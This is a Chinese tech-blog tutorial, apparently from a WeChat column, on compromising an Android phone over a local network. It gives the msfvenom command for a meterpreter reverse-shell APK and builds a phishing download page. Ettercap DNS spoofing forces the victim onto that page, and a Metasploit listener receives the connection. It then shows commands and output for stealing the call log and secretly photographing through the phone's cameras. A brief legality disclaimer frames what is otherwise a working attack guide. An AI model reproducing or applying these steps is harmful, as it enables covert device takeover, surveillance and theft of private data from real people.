专栏名称: 院长技术
《院长技术》专注于DevOps技术栈研究,云原生、Istio,CICD、Docker、Prometheus、K8s、ServiceMesh、Jenkins、Linux、微服务、分布式存储、监控、日志收集、安全渗透、虚拟化等技术栈。
目录
相关文章推荐
可爱多手工艺术  ·  王菲谢霆锋又高调官宣喜讯!恭喜啊,终于等到这 ... ·  19 小时前  
可爱多手工艺术  ·  废旧塑料瓶一次性酸奶杯奶茶杯都不要随手就扔, ... ·  19 小时前  
51好读  ›  专栏  ›  院长技术

Kali利用Android木马渗透手机(高级篇)

院长技术  · 公众号  ·  · 2024-02-22 09:35

正文

院长简介

作者:院长

职位:运维开发工程师

官网:https://deanit.cn

博客:https://blog.deanit.cn

擅长:

【虚拟化,容器化,自动化运维,CICD,监控,日志,中间件,双机热备,分布式存储,数据库,认证,组网隧道,Kali 安全渗透,网络攻击,负载均衡,Html,Css,Js,Jq,Vue3,Shell,Python,Go,前后端框架】

前言

内网渗透,非公网IP上线。不得非法入侵他人设备,遵纪守法,天网恢恢疏而不漏

利用DNS劫持内网准备钓鱼网页诱导下载安装安卓木马

互联网非法外之地,还请各位兄弟谨记,且行且珍惜。

第一步

生成安卓木马

msfvenom -p android/meterpreter/reverse_tcp LHOST=kali本机ip LPORT=监听端口 R > /放置的目录/文件名.apk

第二步制作钓鱼网页

在这里我已经简单的准备了一个页面 代码如下

2.png

将生成的木马和编写页面放置到 /var/www/html/ 目录下

3.png

然后启动 Apache2

systemctl start apache2

第三步开启DNS劫持

*编辑ettercap的DNS文件

nano /etc/ettercap/etter.dns
4.png

*启动ettercap

ettercap -G
5.png

*操作步骤

6.png

在弹出的窗口选择自己的网卡然后扫描内网IP

7.png

选择网关 add to target 1 选择目标 add to target 2

8.png

点击图中的菜单在之后弹出的选项中选择第一个然后确定

9.png
10.png

然后我们开启攻击

11.png

开启攻击后我们打开插件双击 dns_spoof 进行 DNS 毒化操作

手机端状态

此时我们手机端无法联网,访问任何网页都是我们实现安排好的页面效果如下

13.jpg

可以看到木马是没有报毒的,至少在MIUI11下是没有提示有病毒,并且申请了很多的权限。

启动木马监听等待目标上线

我们在终端启动 msfconsole 依次执行:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.123.10 //kali 本机的ip
set LPORT 9055  //监听上线的端口 需要与生成木马的时候填写一样
exploit   //执行监听
15.png

然后我们静等目标上线

16.png

上面这张图是目标上线后的样子,当目标上线后我们就可以停止 DNS劫持

当关闭劫持后目标恢复网络连接。

使用木马窃取信息

现在我们先使用木马窃取对方通话记录 在终端输入 dump_calllog 此时返回的数据应该是

meterpreter > dump_calllog
[*] Fetching 243 entries
[*] Call log saved to calllog_dump_20191126214943.txt
meterpreter > 

然后我们去 root 目录下能看到抓取到的通话记录打开后

17.png

接下来利用木马进行拍照 在终端输入 webcam_list 获取目标手机的摄像头数量

meterpreter > webcam_list
1: Back Camera
2: Front Camera
meterpreter > 

返回给我们两个摄像头 一个前置一个后置 我们利用 webcam_snap -i 指定一个摄像头进行拍照

webcam_snap -i 1

命令执行完成之后会自动打开照片展示出来

结尾

安卓木马的功能不仅仅只有这么一些,剩下的东西也是需要大家自己去摸索的,好了本次教程到此结束,还是需要提醒大家不要做出违法的事情,谢谢。

招贤纳士

欢迎👏关注《院长技术》,只做原创,干货~~~

更多技术干货持续输出中......

欢迎👏加院长助理,邀请微信群:《烦请关注公众号》







请到「今天看啥」查看全文